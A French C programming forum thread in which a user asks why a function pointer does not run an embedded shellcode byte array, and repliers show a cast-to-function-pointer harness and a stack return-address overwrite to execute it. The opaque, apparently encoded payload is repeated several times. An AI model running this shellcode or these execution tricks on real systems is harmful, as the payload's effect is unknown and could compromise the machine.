Discussion :

[chuko]

Bonjour a tous un petit souci sur un pointeur fonction je poste le code

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
 
 
int fonct()
{
char scode[]=
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfb"
"\xe2\x8d\x15\x83\xeb\xfc\xe2\xf4\x07\x0a\xc9\x15\xfb\xe2\x06\x50"
"\xc7\x69\xf1\x10\x83\xe3\x62\x9e\xb4\xfa\x06\x4a\xdb\xe3\x66\x5c"
"\x70\xd6\x06\x14\x15\xd3\x4d\x8c\x57\x66\x4d\x61\xfc\x23\x47\x18"
"\xfa\x20\x66\xe1\xc0\xb6\xa9\x11\x8e\x07\x06\x4a\xdf\xe3\x66\x73"
"\x70\xee\xc6\x9e\xa4\xfe\x8c\xfe\x70\xfe\x06\x14\x10\x6b\xd1\x31"
"\xff\x21\xbc\xd5\x9f\x69\xcd\x25\x7e\x22\xf5\x19\x70\xa2\x81\x9e"
"\x8b\xfe\x20\x9e\x93\xea\x66\x1c\x70\x62\x3d\x15\xfb\xe2\x06\x7d"
"\xc7\xbd\xbc\xe3\x9b\xb4\x04\xed\x78\x22\xf6\x45\x93\x12\x07\x11"
"\xa4\x8a\x15\xeb\x71\xec\xda\xea\x1c\x81\xec\x79\x98\xcc\xe8\x6d"
"\x9e\xe2\x8d\x15";
}
 
int main(int argc, char *argv[])
{
 
  int(*p)();
  p=&fonct;
  (*p)();
 
 
 
 
  system("PAUSE");	
  return 0;
}

Normalement le pointeur devrai sauter sur l'adresse de ma fonction et exécuter les opcodes un a un mais ça ne marche pas,j' ai du faire une erreur si quelqu'un pouvait m'éclairer ce serai sympa merci d'avance

[firemax]

Moi j'aurais plutot fais les choses comme ca :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
 
int main(int argc, char *argv[])
{
 
  int (*p)();
  p=fonct;
  p();
  system("PAUSE");	
  return 0;
}

[orfix]

Normalement le pointeur devrai sauter sur l'adresse de ma fonction et exécuter les opcodes un a un mais ça ne marche pas,j' ai du faire une erreur si quelqu'un pouvait m'éclairer ce serai sympa merci d'avance

il faut pointer non pas sur la fonction ( qui ne fait rien du tout ) mais sur ton shellCode directement grâce à un cast explicite comme ceci :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 
char scode[]=
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfb"
"\xe2\x8d\x15\x83\xeb\xfc\xe2\xf4\x07\x0a\xc9\x15\xfb\xe2\x06\x50"
"\xc7\x69\xf1\x10\x83\xe3\x62\x9e\xb4\xfa\x06\x4a\xdb\xe3\x66\x5c"
"\x70\xd6\x06\x14\x15\xd3\x4d\x8c\x57\x66\x4d\x61\xfc\x23\x47\x18"
"\xfa\x20\x66\xe1\xc0\xb6\xa9\x11\x8e\x07\x06\x4a\xdf\xe3\x66\x73"
"\x70\xee\xc6\x9e\xa4\xfe\x8c\xfe\x70\xfe\x06\x14\x10\x6b\xd1\x31"
"\xff\x21\xbc\xd5\x9f\x69\xcd\x25\x7e\x22\xf5\x19\x70\xa2\x81\x9e"
"\x8b\xfe\x20\x9e\x93\xea\x66\x1c\x70\x62\x3d\x15\xfb\xe2\x06\x7d"
"\xc7\xbd\xbc\xe3\x9b\xb4\x04\xed\x78\x22\xf6\x45\x93\x12\x07\x11"
"\xa4\x8a\x15\xeb\x71\xec\xda\xea\x1c\x81\xec\x79\x98\xcc\xe8\x6d"
"\x9e\xe2\x8d\x15";
 
int main(int argc, char *argv[])
{
	int(*p)();
	p = (int(*)())scode;
	(*p)();
 
	system("PAUSE");	
	return 0;
}

ton shellcode est erroné ... en désassemblant ton code je n'ai pas trouvé de RET ....

[nicolas.sitbon]

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <stdlib.h>
 
char shellcode[] = /* appelons un chat, un chat!! */
   "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfb"
   "\xe2\x8d\x15\x83\xeb\xfc\xe2\xf4\x07\x0a\xc9\x15\xfb\xe2\x06\x50"
   "\xc7\x69\xf1\x10\x83\xe3\x62\x9e\xb4\xfa\x06\x4a\xdb\xe3\x66\x5c"
   "\x70\xd6\x06\x14\x15\xd3\x4d\x8c\x57\x66\x4d\x61\xfc\x23\x47\x18"
   "\xfa\x20\x66\xe1\xc0\xb6\xa9\x11\x8e\x07\x06\x4a\xdf\xe3\x66\x73"
   "\x70\xee\xc6\x9e\xa4\xfe\x8c\xfe\x70\xfe\x06\x14\x10\x6b\xd1\x31"
   "\xff\x21\xbc\xd5\x9f\x69\xcd\x25\x7e\x22\xf5\x19\x70\xa2\x81\x9e"
   "\x8b\xfe\x20\x9e\x93\xea\x66\x1c\x70\x62\x3d\x15\xfb\xe2\x06\x7d"
   "\xc7\xbd\xbc\xe3\x9b\xb4\x04\xed\x78\x22\xf6\x45\x93\x12\x07\x11"
   "\xa4\x8a\x15\xeb\x71\xec\xda\xea\x1c\x81\xec\x79\x98\xcc\xe8\x6d"
   "\x9e\xe2\x8d\x15";
 
 
int main (void)
{
   size_t *ret = (size_t *)(&ret + 2);
   *ret = (size_t)shellcode;
   return 0;
}

Apparamment ça n'est pas un shellcode pour Linux ou BSD.

[Emmanuel Delahaye]

il faut pointer non pas sur la fonction ( qui ne fait rien du tout ) mais sur ton shellCode directement grâce à un cast explicite comme ceci :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
 
int main(int argc, char *argv[])
{
	int(*p)();
	p = (int(*)())scode;
	(*p)();
 
	system("PAUSE");	
	return 0;
}

Le comportement est indéfini, car tu mets l'adresse d'une variable dans un pointeur de fonction... Ca peut fonctionner ... ou pas, selon les phases de la lune, l'age du capitaine...

[firemax]

Le comportement est indéfini, car tu mets l'adresse d'une variable dans un pointeur de fonction... Ca peut fonctionner ... ou pas, selon les phases de la lune, l'age du capitaine...

Je comprend pas bien ce que tu veux m'expliquer, fonct n'est pas une variable (dans mon exemple c'etais int fonct()).

[Emmanuel Delahaye]

Je comprend pas bien ce que tu veux m'expliquer, fonct n'est pas une variable (dans mon exemple c'etais int fonct()).

Désolé, je me suis embrouillé avec les différents répondeurs... J'ai corrigé.

Ton code est techniquement correct, mais évidemment, le shellcode étant en mémoire de données, il n'est pas exécuté...

[Melem]

@chucko : ce n'est pas toi-même qui as déjà créé cette discussion : ASM dans programme C ? Je ne vois pas pourquoi on devrait retaper tout ce qui a déjà été posté.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int fonct()
{
    char scode [] = "...";
    return 0;
}
 
int main()
{
    int (*p)();
 
    p = &fonct;
    (*p)();
 
    return 0;
}

Normalement le pointeur devrait sauter sur l'adresse de ma fonction et exécuter les opcodes un a un ...

Non p pointe sur fonct donc (*p)() appelle fonct, qui crée un tableau initialisé puis retourne. Si tu veux faire exécuter du code machine que tu as composé tu pointes sur ces instructions, pas sur autre chose. C'est un moyen de faire, mais pas le seul (voir code de nicolas.sitbon). Mais le plus important, on ne met pas n'importe quoi dans le code. En particulier, une fonction doit toujours se terminer par ret ...

[firemax]

Désolé, je me suis embrouillé avec les différents répondeurs... J'ai corrigé.

Ton code est techniquement correct, mais évidemment, le shellcode étant en mémoire de données, il n'est pas exécuté...

Ok, me posais la question, je cherchais désespérément l'erreur ^^

(et nan le shellcode ne sera pas exécuter mais je pensais que la question se limitait au pointeur sur fonction)

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <stdlib.h>
 
char shellcode[] = /* appelons un chat, un chat!! */
   "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfb"
   "\xe2\x8d\x15\x83\xeb\xfc\xe2\xf4\x07\x0a\xc9\x15\xfb\xe2\x06\x50"
   "\xc7\x69\xf1\x10\x83\xe3\x62\x9e\xb4\xfa\x06\x4a\xdb\xe3\x66\x5c"
   "\x70\xd6\x06\x14\x15\xd3\x4d\x8c\x57\x66\x4d\x61\xfc\x23\x47\x18"
   "\xfa\x20\x66\xe1\xc0\xb6\xa9\x11\x8e\x07\x06\x4a\xdf\xe3\x66\x73"
   "\x70\xee\xc6\x9e\xa4\xfe\x8c\xfe\x70\xfe\x06\x14\x10\x6b\xd1\x31"
   "\xff\x21\xbc\xd5\x9f\x69\xcd\x25\x7e\x22\xf5\x19\x70\xa2\x81\x9e"
   "\x8b\xfe\x20\x9e\x93\xea\x66\x1c\x70\x62\x3d\x15\xfb\xe2\x06\x7d"
   "\xc7\xbd\xbc\xe3\x9b\xb4\x04\xed\x78\x22\xf6\x45\x93\x12\x07\x11"
   "\xa4\x8a\x15\xeb\x71\xec\xda\xea\x1c\x81\xec\x79\x98\xcc\xe8\x6d"
   "\x9e\xe2\x8d\x15";
 
 
int main (void)
{
   size_t *ret = (size_t *)(&ret + 2);
   *ret = (size_t)shellcode;
   return 0;
}

Apparamment ça n'est pas un shellcode pour Linux ou BSD.

Sinon (desoler chuko je me sert un peu de ton thread) je comprend pas bien cette partie de code :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
size_t *ret = (size_t *)(&ret + 2);
   *ret = (size_t)shellcode;

Est t'il possible que quelqu'un explique ?

[Emmanuel Delahaye]

Bonjour a tous un petit souci sur un pointeur fonction je poste le code
<...>
Normalement le pointeur devrai sauter sur l'adresse de ma fonction et exécuter les opcodes un a un mais ça ne marche pas,j' ai du faire une erreur si quelqu'un pouvait m'éclairer ce serai sympa merci d'avance

C'est louche. C'est quoi ces opcodes ? Ils ont du sens pour ta machine ? Ca fait quoi ?

De toutes façons, ce sont des données, donc ils ne sont pas exécutés. Il n'y a pas de moyen portable de faire ce que tu veux faire.